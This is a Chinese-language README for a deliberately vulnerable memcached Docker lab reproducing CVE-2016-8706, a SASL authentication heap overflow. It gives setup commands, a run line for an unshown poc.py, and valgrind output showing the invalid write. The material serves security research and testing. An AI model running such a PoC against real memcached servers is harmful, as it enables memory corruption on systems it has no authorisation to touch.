Memcached Server SASL AUTENTICATION 远程代码执行漏洞(CVE-2016-8706)环境

说明

感谢 @xing-xiao 提供原始环境。 #6

漏洞信息

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:m_memcached_CVE-2016-8706
  2. 启动环境

    $ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8706

    如果需要追溯堆栈,需在启动时 valgrind 调试 memcached,则启动环境命令如下:

    $ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh

使用国内阿里云镜像

  1. 拉取镜像到本地

    $ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
  2. 启动环境

    $ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32

PoC

  1. 获取目标 IP 地址与端口号,如:192.168.100.2 端口号为 11211

  2. docker ps 查看容器ID(如获得的ID为:cfd94f8d5f93)

    附加 memcached 进程用于监测结果:

    $ docker attach cfd94f8d5f93
  3. 执行 poc.py

$ python poc.py 192.168.100.2 11211
  1. 查看结果
<36 Read binary protocol data:
<36    0x80 0x21 0x00 0x20
<36    0x00 0x00 0x00 0x01
<36    0x00 0x00 0x00 0x01
<36    0x41 0x41 0x41 0x41
<36    0x41 0x41 0x41 0x41
<36    0x41 0x41 0x41 0x41
authenticated() in cmd 0x21 is true
36: going from conn_parse_cmd to conn_nread
==8== Thread 3:
==8== Invalid write of size 8
==8==    at 0x413432: memcpy (string3.h:53)
==8==    by 0x413432: do_item_alloc (items.c:240)
==8==    by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8==    by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8==    by 0x4097ED: complete_nread (memcached.c:2484)
==8==    by 0x40D367: drive_machine (memcached.c:4656)
==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8==    by 0x414874: worker_libevent (thread.c:380)
==8==    by 0x52A26B9: start_thread (pthread_create.c:333)
==8==  Address 0x5d327e9 is 1,048,505 bytes inside a block of size 1,048,512 alloc'd
==8==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8==    by 0x40F9DF: memory_allocate (slabs.c:538)
==8==    by 0x40F9DF: do_slabs_newslab (slabs.c:233)
==8==    by 0x40FA6E: do_slabs_alloc (slabs.c:328)
==8==    by 0x41007E: slabs_alloc (slabs.c:584)
==8==    by 0x4131E6: do_item_alloc (items.c:180)
==8==    by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8==    by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8==    by 0x4097ED: complete_nread (memcached.c:2484)
==8==    by 0x40D367: drive_machine (memcached.c:4656)
==8==    by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8==    by 0x414874: worker_libevent (thread.c:380)
==8==    by 0x52A26B9: start_thread (pthread_create.c:333)
==8==

注意:

该 PoC 并不会造成服务端崩溃。

Exp

暂无命令执行 Exp,如果你愿意分享该 Exp 可向本仓库发起 Pull Request

Copied From: Medicean/VulApps/m/memcached/cve-2016-8706